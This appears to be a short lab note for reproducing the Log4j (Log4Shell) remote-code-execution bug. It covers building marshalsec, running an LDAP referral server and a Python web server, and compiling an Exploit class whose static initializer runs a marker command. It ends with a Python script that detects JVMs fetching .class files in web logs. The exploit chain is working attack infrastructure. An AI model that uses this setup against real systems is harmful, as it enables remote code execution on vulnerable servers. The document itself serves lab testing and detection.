Log4J Shenanigans


The first PoC was found here: https://github.com/tangxiaofeng7/apache-log4j-poc.git. It no longer exists, thanks GitHub!

I tested this with Java version:

openjdk version "1.8.0_312"
OpenJDK Runtime Environment (build 1.8.0_312-8u312-b07-0ubuntu1~20.04-b07)
OpenJDK 64-Bit Server VM (build 25.312-b07, mixed mode)


Once in the environment, make sure marshalsec has been copied over; if not, download and build it:

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests


Run it, probably in screen:

screen java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://localhost:8888/#Exploit"


Create the exploit and compile it:

javac Exploit.java

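// Exploit.java
class Exploit {
    // Static initializer: runs as soon as the JVM loads and initializes this class.
    static {
        // Harmless marker command; the file /tmp/pwned shows that the code executed.
        try { Runtime.getRuntime().exec("touch /tmp/pwned"); } catch(Exception e) {}
    }
}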


Run your web server:

screen python -m SimpleHTTPServer 8888
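
Detection side of the lab above, as an added example that is not part of the original notes: the last hop of this setup is a JVM fetching Exploit.class from the web server on port 8888, and that request is visible in proxy or web-server logs. The sketch below flags GET requests for .class files sent with Java's default User-Agent. The Combined Log Format, the sample lines (constructed) and the function name find_remote_class_loads are assumptions.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format (assumed): host ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# Java's built-in HTTP client identifies itself as "Java/<version>" by default.
JAVA_UA_RE = re.compile(r"^Java/\d")

# Constructed sample lines for illustration, not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /Exploit.class HTTP/1.1" 200 312 "-" "Java/1.8.0_312"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /maven2/a/b.jar HTTP/1.1" 200 9000 "-" "Java/1.8.0_312"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /Exploit.class HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:05 +0000] "GET http://203.0.113.10:8888/Exploit.class HTTP/1.1" 200 312 "-" "Java/11.0.13"',
    'truncated or malformed line',
]


def find_remote_class_loads(lines):
    """Return one finding per request where a JVM fetched a .class file over HTTP."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if m is None:
            continue  # unparseable line: skip rather than guess at its fields
        # urlsplit handles both origin-form ("/x.class") and proxy absolute-form targets.
        url = urlsplit(m["target"])
        if (m["method"] == "GET" and url.path.lower().endswith(".class")
                and JAVA_UA_RE.match(m["ua"])):
            findings.append({
                "line": lineno, "src": m["src"], "host": url.netloc or None,
                "path": url.path, "status": int(m["status"]), "ua": m["ua"],
            })
    return findings


if __name__ == "__main__":
    for finding in find_remote_class_loads(SAMPLE_LOG):
        print(finding)
```

A 200 status on a finding means the class file was actually delivered to the JVM, so that source host is the one to triage first.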